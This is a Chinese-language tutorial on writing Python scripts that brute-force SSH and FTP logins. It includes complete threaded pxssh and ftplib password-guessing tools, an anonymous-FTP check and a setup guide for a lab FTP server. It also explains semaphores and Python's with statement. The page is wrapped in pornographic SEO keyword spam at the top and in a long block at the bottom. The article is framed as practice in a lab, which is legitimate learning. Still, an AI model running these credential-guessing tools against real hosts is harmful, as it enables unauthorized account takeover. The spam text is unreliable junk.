校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁(yè) > 知識(shí)庫(kù) > Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)

Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)

熱門(mén)標(biāo)簽:地圖標(biāo)注與注銷 宿州電話機(jī)器人哪家好 無(wú)錫智能外呼系統(tǒng)好用嗎 百應(yīng)電話機(jī)器人總部 西青語(yǔ)音電銷機(jī)器人哪家好 成都呼叫中心外呼系統(tǒng)哪家強(qiáng) 電梯新時(shí)達(dá)系統(tǒng)外呼顯示e 南昌地圖標(biāo)注 旅游廁所地圖標(biāo)注怎么弄

前言

本文繼續(xù)學(xué)習(xí)下 Python 編程在網(wǎng)絡(luò)攻防領(lǐng)域的應(yīng)用,主要是通過(guò) Python 腳本進(jìn)行 SSH 登錄爆破和 FTP 服務(wù)登錄爆破。

SSH爆破

演示環(huán)境借助 Kali 虛擬機(jī)進(jìn)行自身的 SSH 服務(wù)的登錄爆破,注意提前修改/etc/ssh/sshd_config配置文件并執(zhí)行命令service ssh start運(yùn)行 SSH 服務(wù)。

腳本演示

先來(lái)看看代碼:

from pexpect import pxssh
import argparse
import threading
import sys

maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)


def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        # 登錄ssh測(cè)試
        s.login(host, user, password)
        print("[+] Password Found: {}".format(password))
        sys.exit(0)
    except pxssh.ExceptionPxssh as e:
        pass


def main():
    # 定義腳本的運(yùn)行參數(shù)、獲取用戶輸入的對(duì)應(yīng)參數(shù)值
    parser = argparse.ArgumentParser()
    parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
    parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
    parser.add_argument('-u', dest='user')
    args = parser.parse_args()
    host = args.Host
    passwdFile = args.passwdFile
    user = args.user
    # 讀取字典文件、使用多線程進(jìn)行口令爆破
    with open(passwdFile, 'r') as f:
        for line in f.readlines():
            with connect_lock:
                password = line.strip('\n')
                print("[-] Testing: {}".format(password))
                # 起線程每個(gè)密碼嘗試登錄一次
                t = threading.Thread(target=connect, args=(host, user, password))
                t.start()

main()

在 Kali 終端運(yùn)行,運(yùn)行腳本可使用 -h 參數(shù)獲得提示,效果如下:


最終暴力破解獲得密碼 root:


上述腳本開(kāi)啟 5 個(gè)線程連接,開(kāi)啟線程速度會(huì)更快是因?yàn)檫@里要遠(yuǎn)程連接,等待網(wǎng)絡(luò)有阻塞,故開(kāi)啟多線程可以加快速度(實(shí)際上多線程是一個(gè) CPU 在交替運(yùn)行)。

信號(hào)量類

注意到代碼中使用threading.BoundedSemaphore(value=maxConnetions)來(lái)控制最大線程數(shù)量,下面來(lái)學(xué)習(xí)下相關(guān)語(yǔ)法知識(shí)。

Python 的 threading 線程模塊中的 Semaphore 類和 BoundedSemaphore 類來(lái)實(shí)現(xiàn)并發(fā)限制。

  • Semaphore 類和 BoundedSemaphore 類都是信號(hào)量類,每次有線程獲得信號(hào)量(即 acquire() )的時(shí)候計(jì)數(shù)器 -1,釋放信號(hào)量(release())時(shí)候計(jì)數(shù)器+1,計(jì)數(shù)器為 0 的時(shí)候其它線程就被阻塞無(wú)法獲得信號(hào)量;
  • 當(dāng)計(jì)數(shù)器為設(shè)定好的上限的時(shí)候 BoundedSemaphore 就無(wú)法進(jìn)行 release() 操作了,而 Semaphore 沒(méi)有這個(gè)限制檢查。

下面直接通過(guò)這兩個(gè)類的簡(jiǎn)單示例來(lái)學(xué)習(xí)理解下這兩個(gè)類在線程控制中的意義。

1、首先看看 Semaphore 類:

# coding: utf-8
import threading
import time


def fun(semaphore, num):
    # 獲得信號(hào)量,信號(hào)量減一
    semaphore.acquire()
    print("Thread %d is running." % num)
    time.sleep(3)
    # 釋放信號(hào)量,信號(hào)量加一
    semaphore.release()


if __name__=='__main__':
    # 初始化信號(hào)量,數(shù)量為2
    semaphore = threading.Semaphore(2)
    # 運(yùn)行4個(gè)線程
    for num in range(4):
        t = threading.Thread(target=fun, args=(semaphore, num))
        t.start()

代碼運(yùn)行效果:

可以注意到線程 0 和 1 是一起打印出消息的,而線程 2 和 3 是在 3 秒后打印的,可以得出每次只有 2 個(gè)線程獲得信號(hào)量,進(jìn)行打印。

2、接下來(lái)看看 BoundedSemaphore 類:

# encoding: UTF-8
import threading
import time

def showfun(n):
    print("%s start -- %d"%(time.ctime(),n))
    print("working")
    time.sleep(2)
    print("%s end -- %d" % (time.ctime(), n))
    semlock.release()

if __name__ == '__main__':
    maxconnections = 5
    semlock = threading.BoundedSemaphore(maxconnections)
    list=[]
    for i in range(8):
        semlock.acquire()
        t=threading.Thread(target=showfun, args=(i,))
        list.append(t)
        t.start()

看看代碼運(yùn)行效果:

Sun Aug 8 18:59:37 2021 start -- 0
working
Sun Aug 8 18:59:37 2021 start -- 1
working
Sun Aug 8 18:59:37 2021 start -- 2
working
Sun Aug 8 18:59:37 2021 start -- 3
working
Sun Aug 8 18:59:37 2021 start -- 4
working
Sun Aug 8 18:59:39 2021 end -- 0
Sun Aug 8 18:59:39 2021 end -- 1
Sun Aug 8 18:59:39 2021 end -- 2
Sun Aug 8 18:59:39 2021 end -- 3
Sun Aug 8 18:59:39 2021 end -- 4
Sun Aug 8 18:59:39 2021 start -- 5
working
Sun Aug 8 18:59:39 2021 start -- 6
working
Sun Aug 8 18:59:39 2021 start -- 7
working
Sun Aug 8 18:59:41 2021 end -- 5
Sun Aug 8 18:59:41 2021 end -- 6
Sun Aug 8 18:59:41 2021 end -- 7

線程數(shù)限制到 5 個(gè),因此等待 0-4 完畢之后 5-7 才能請(qǐng)求到資源進(jìn)行執(zhí)行。

with 用法

上面代碼中注意到還使用了with connect_lock:語(yǔ)句進(jìn)行信號(hào)量的管理,故來(lái)學(xué)習(xí)下 with 關(guān)鍵詞的使用。在 Python 中,with 語(yǔ)句適用于對(duì)資源進(jìn)行訪問(wèn)的場(chǎng)合,確保不管使用過(guò)程中是否發(fā)生異常都會(huì)執(zhí)行必要的“清理”操作,釋放資源,比如文件使用后自動(dòng)關(guān)閉/線程中鎖的自動(dòng)獲取和釋放等。

1、問(wèn)題引出

如下代碼:

file = open("1.txt")
data = file.read()
file.close()

上面代碼存在2個(gè)問(wèn)題:

  • 文件讀取發(fā)生異常,但沒(méi)有進(jìn)行任何處理;
  • 可能忘記關(guān)閉文件句柄;

2、代碼改進(jìn)

try:
    f = open('xxx')
except:
    print('fail to open')
    exit(-1)
try:
    do something
except:
    do something
finally:
    f.close()

雖然這段代碼運(yùn)行良好,但比較冗長(zhǎng)。而使用 with 的話,能夠減少冗長(zhǎng),還能自動(dòng)處理上下文環(huán)境產(chǎn)生的異常,如下面代碼:

with open("1.txt") as file:
    data = file.read()

3、with 工作原理

  • 緊跟 with 后面的語(yǔ)句被求值后,返回對(duì)象的 “–enter–()” 方法被調(diào)用,這個(gè)方法的返回值將被賦值給 as 后面的變量;
  • 當(dāng)with后面的代碼塊全部被執(zhí)行完之后,將調(diào)用前面返回對(duì)象的 “–exit–()” 方法。

with 工作原理代碼示例:

class Sample:
    def __enter__(self):
        print "in __enter__"
        return "Foo"
    def __exit__(self, exc_type, exc_val, exc_tb):
        print "in __exit__"
def get_sample():
    return Sample()
with get_sample() as sample:
    print "Sample: ", sample

代碼的運(yùn)行結(jié)果如下:

in __enter__
Sample: Foo
in __exit__

4、with 作用小結(jié)

with 看起來(lái)如此簡(jiǎn)單,但是其背后還有一些工作要做,因?yàn)槟悴荒軐?duì) python 的任意對(duì)象使用 with,它僅能工作于支持上下文管理協(xié)議的對(duì)象。只有內(nèi)建了“上下文管理”的對(duì)象可以和 with 一起工作,目前支持該協(xié)議的對(duì)象有:

file
decimal.Context
thread.LockType
threading.Lock
threading.RLock
threading.Condition
threading.Semaphore
threading.BoundedSemaphore

因?yàn)樯舷挛墓芾砥髦饕饔糜诠蚕碣Y源,__enter__()__exit__()方法干的基本是需要分配和釋放資源的低層次工作,比如數(shù)據(jù)庫(kù)連接、鎖分配、信號(hào)量加/減、狀態(tài)管理、文件打開(kāi)和關(guān)閉、異常處理等。

FTP爆破

FTP(File Transfer Protocol)即文件傳輸協(xié)議,是一種基于 TCP 的協(xié)議,采用客戶/服務(wù)器模式。通過(guò) FTP 協(xié)議,用戶可以在FTP服務(wù)器中進(jìn)行文件的上傳或下載等操作。雖然現(xiàn)在通過(guò) HTTP 協(xié)議下載的站點(diǎn)有很多,但是由于FTP協(xié)議可以很好地控制用戶數(shù)量和寬帶的分配,快速方便地上傳、下載文件,因此FTP已成為網(wǎng)絡(luò)中文件上傳和下載的首選服務(wù)器。

服務(wù)搭建

下面演示在 Win10 虛擬機(jī)搭建 FTP 服務(wù)。

1、打開(kāi)的【W(wǎng)indows功能】,將 Internet 信息服務(wù)的 4 個(gè)子功能打勾“√”,然后點(diǎn)擊【確定】按鈕安裝這些功能,圖示如下:


2、在系統(tǒng)安裝配置完成后,打開(kāi) IIS 管理器,點(diǎn)擊【添加FTP站點(diǎn)】,圖示如下:

3、

輸入 FTP 站點(diǎn)名稱,以及允許用戶訪問(wèn)的目錄路徑,圖示如下:


4、在【綁定】IP 中輸入你本機(jī)的 IP 地址,選擇“無(wú)SSL”,圖示如下:


5、身份驗(yàn)證選擇“基本”,指定 Win10 的用戶 True 可登錄,完成配置:


6、物理機(jī)瀏覽器輸入 ftp://win10虛擬機(jī)ip,即可訪問(wèn)創(chuàng)建的 ftp 服務(wù),需要輸入賬戶密碼:


7、驗(yàn)證完賬戶密碼,即可看到 FTP 服務(wù)的目錄:

點(diǎn)擊查看具體文件內(nèi)容:


以上便在局域網(wǎng)內(nèi)部的 Win10 虛擬機(jī)搭建了 FTP 服務(wù),并指定了登錄用戶為 True。

補(bǔ)充一個(gè)概念:匿名FTP服務(wù)

匿名 FTP 是這樣一種機(jī)制:用戶可通過(guò)它連接到遠(yuǎn)程主機(jī)上,并從其下載文件,而無(wú)需成為其注冊(cè)用戶。系統(tǒng)管理員建立了一個(gè)特殊的用戶 ID,名為anonymous, Internet 上的任何人在任何地方都可使用該用戶 ID。

通過(guò) FTP 程序連接匿名 FTP 主機(jī)的方式同連接普通 FTP 主機(jī)的方式差不多,只是在要求提供用戶標(biāo)識(shí) ID 時(shí)必須輸入anonymous,該用戶 ID 的口令可以是任意的字符串。習(xí)慣上,用自己的 E-mail 地址作為口令,使系統(tǒng)維護(hù)程序能夠記錄下來(lái)誰(shuí)在存取這些文件。

匿名掃描

下面先來(lái)演示下借助腳本測(cè)試 FTP 服務(wù)器是否啟用匿名登錄:

# coding=utf-8
import ftplib


def ftpLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'Tr0e@123.com')
        print('[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
        ftp.quit()
        exit(0)
    except Exception as e:
        print('[-] FTP Anonymous Logon Failed.',e)


if __name__ == "__main__":
    ftpLogin("192.168.66.101")

代碼運(yùn)行結(jié)果,可見(jiàn)當(dāng)前 FTP 服務(wù)器并不支持匿名登錄:

可更改 Win10 虛擬機(jī)的 FTP 服務(wù)配置,啟用匿名登錄:

暴力破解

下面來(lái)對(duì) FTP 服務(wù)的 True 賬戶的密碼進(jìn)行暴力破解:

# coding=utf-8
import ftplib


def BruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print('[+] Trying: ' + username + '/' + password)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
            print('[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password)
            ftp.quit()
            exit(0)
        except Exception as e:
            pass
    print('[-] Could not brubrute force FTP credentials.')
    exit(0)


if __name__=="__main__":
    BruteLogin("192.168.66.101", "pwd.txt")

代碼運(yùn)行效果如下:


其中密碼字典如下:

總結(jié)

本文學(xué)習(xí)了如何通過(guò) Python 腳本進(jìn)行 FTP、SSH 服務(wù)的登錄爆破,雖然 Kali 自帶了類似的工具,但是主要目的還是鍛煉 Python 編程能力和學(xué)習(xí) Python 編程應(yīng)用。后續(xù)還會(huì)繼續(xù)學(xué)習(xí) Python 更多的網(wǎng)絡(luò)攻防應(yīng)用場(chǎng)景!

到此這篇關(guān)于Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)的文章就介紹到這了,更多相關(guān)Python 暴力破解 內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Python暴力破解Mysql數(shù)據(jù)的示例
  • python編寫(xiě)暴力破解zip文檔程序的實(shí)例講解
  • 利用Python暴力破解zip文件口令的方法詳解
  • Python腳本暴力破解柵欄密碼
  • python編寫(xiě)暴力破解FTP密碼小工具

標(biāo)簽:雅安 辛集 贛州 許昌 渭南 西安 濰坊 七臺(tái)河

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)》,本文關(guān)鍵詞  Python,中,FTP,服務(wù),與,SSH,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    欧美国产乱子伦 | 欧美一级高清大全免费观看| 精品乱人伦小说| 国产精品电影一区二区三区| 午夜精品福利久久久| 国产不卡一区视频| 欧洲另类一二三四区| 国产亚洲欧洲一区高清在线观看| 一区二区三区视频在线看| 国产一区二区精品久久99| 欧美亚洲国产一区二区三区va| 久久这里只有精品视频网| 亚洲福利视频一区二区| 成人午夜精品在线| 欧美电视剧免费全集观看| 亚洲综合色婷婷| av在线不卡免费看| 久久综合九色综合97婷婷女人 | 国产丶欧美丶日本不卡视频| 欧美午夜精品免费| 亚洲视频 欧洲视频| 国产成人在线免费| 日韩精品一区二区三区swag| 亚洲成av人片| 欧美在线影院一区二区| 中文字幕一区二区三区精华液| 九九国产精品视频| 91精品国产综合久久久久久| 亚洲综合成人在线视频| 91偷拍与自偷拍精品| 久久精品人人做人人综合| 久久99这里只有精品| 91麻豆精品国产自产在线观看一区 | 久久人人97超碰com| 蜜臀久久99精品久久久画质超高清 | 欧美xxxxxxxxx| 日韩在线播放一区二区| 色综合久久久久久久| 成人欧美一区二区三区白人 | 国产精品乱人伦中文| 国产91综合网| 中文无字幕一区二区三区| 国产黑丝在线一区二区三区| 亚洲精品一区二区精华| 看片的网站亚洲| 国产欧美日韩另类一区| av网站一区二区三区| 一区二区三区国产精华| 欧美性受xxxx黑人xyx| 婷婷夜色潮精品综合在线| 日韩欧美在线影院| 国产一二精品视频| 国产精品素人视频| 在线观看视频91| 伦理电影国产精品| 国产女主播视频一区二区| 91麻豆成人久久精品二区三区| 亚洲国产一区二区三区青草影视| 欧美一区二区美女| 国产成人免费在线视频| 一区二区三区四区在线播放 | 国产丝袜美腿一区二区三区| 国产成人精品亚洲777人妖| 日韩精品一区二区三区视频| 日韩vs国产vs欧美| 欧美撒尿777hd撒尿| 国产精品久久久久一区二区三区共| 久久成人麻豆午夜电影| 日韩欧美一二三区| 日本aⅴ精品一区二区三区| 欧美精品一卡两卡| 91麻豆免费观看| 免费人成网站在线观看欧美高清| 欧美日韩激情一区二区三区| 丝袜亚洲另类欧美| 4438亚洲最大| 久久99精品久久久久| 久久综合九色综合97婷婷女人 | 欧美极品少妇xxxxⅹ高跟鞋| 亚洲视频小说图片| 亚洲精品一区二区三区在线观看| 日本视频在线一区| 欧美日韩免费一区二区三区 | 国产精品视频免费看| fc2成人免费人成在线观看播放| 国产欧美va欧美不卡在线| 激情图片小说一区| 久久久不卡网国产精品一区| 成人性生交大片免费看中文 | 午夜成人免费电影| 日韩午夜电影av| 国精产品一区一区三区mba桃花 | 91精品综合久久久久久| 成人精品在线视频观看| 亚洲精品福利视频网站| 欧美一级片在线看| 国产99久久久久| 日韩伦理免费电影| 成人h动漫精品| 亚洲国产精品久久久男人的天堂| 91精品久久久久久久91蜜桃 | 日韩有码一区二区三区| 亚洲视频一区在线| 3751色影院一区二区三区| 国产精品一区二区不卡| 亚洲猫色日本管| 日韩免费成人网| 午夜精彩视频在线观看不卡| 亚洲人一二三区| 日韩免费一区二区| 97久久超碰国产精品| 蜜臀av性久久久久蜜臀aⅴ四虎 | 日韩欧美综合在线| 成人视屏免费看| 青娱乐精品视频| 亚洲欧洲在线观看av| 欧美三日本三级三级在线播放| 中文字幕一区二区三区四区| 777a∨成人精品桃花网| 国产精品99久久久久久似苏梦涵 | 精品国产免费人成在线观看| 色综合久久久网| 秋霞成人午夜伦在线观看| 欧美一区二区私人影院日本| 日本欧美一区二区| 综合av第一页| 久久网站热最新地址| 色视频一区二区| 国产成人午夜99999| 91丨九色丨黑人外教| 精品一区二区三区免费视频| 夜夜嗨av一区二区三区| 国产欧美一区二区三区鸳鸯浴| 欧美裸体一区二区三区| 不卡av电影在线播放| 色婷婷av一区二区三区之一色屋| 国产精品1区2区| 蜜桃av一区二区| 亚洲地区一二三色| 久久在线免费观看| 亚洲免费成人av| 国产欧美精品一区aⅴ影院 | 亚洲电影在线播放| 亚洲另类色综合网站| 自拍偷拍欧美精品| 国产精品成人免费精品自在线观看| 精品少妇一区二区三区免费观看| 欧美三级电影在线看| 欧美羞羞免费网站| 久久免费美女视频| 26uuu色噜噜精品一区二区| 日韩一区二区三区视频| 91精品久久久久久久99蜜桃| 欧美日韩久久久久久| 久久久久国色av免费看影院| 精品99999| 久久婷婷综合激情| 国产欧美精品一区aⅴ影院 | 亚洲综合色丁香婷婷六月图片| 日韩vs国产vs欧美| 人人超碰91尤物精品国产| 天天影视色香欲综合网老头| 丝袜美腿亚洲综合| 亚洲成a人片在线观看中文| 中文字幕一区不卡| 亚洲欧美自拍偷拍| 亚洲欧美影音先锋| 一区二区三区**美女毛片| 一区二区三区在线播| 久久综合九色综合欧美98| 五月婷婷久久综合| 精品一区二区在线看| 国产九色精品成人porny| av在线不卡电影| 国产精品中文字幕日韩精品 | 久久99久久精品| 国产精品1区2区3区| 国产一区 二区 三区一级| 国产一区二区三区不卡在线观看 | 国产精品成人午夜| 国产欧美视频在线观看| 麻豆成人免费电影| proumb性欧美在线观看| 91国产免费观看| 日韩欧美中文字幕公布| 精品精品国产高清a毛片牛牛| 婷婷国产v国产偷v亚洲高清| 久久精品国产网站| 不卡的电影网站| 91精品国产高清一区二区三区| 日韩区在线观看| 蜜臀精品久久久久久蜜臀| 99国产麻豆精品| 91精品综合久久久久久| 国产精品福利一区| 亚洲欧洲www| 日本va欧美va欧美va精品| 丁香六月久久综合狠狠色| 欧美日韩精品高清| 国产欧美精品一区二区色综合朱莉 |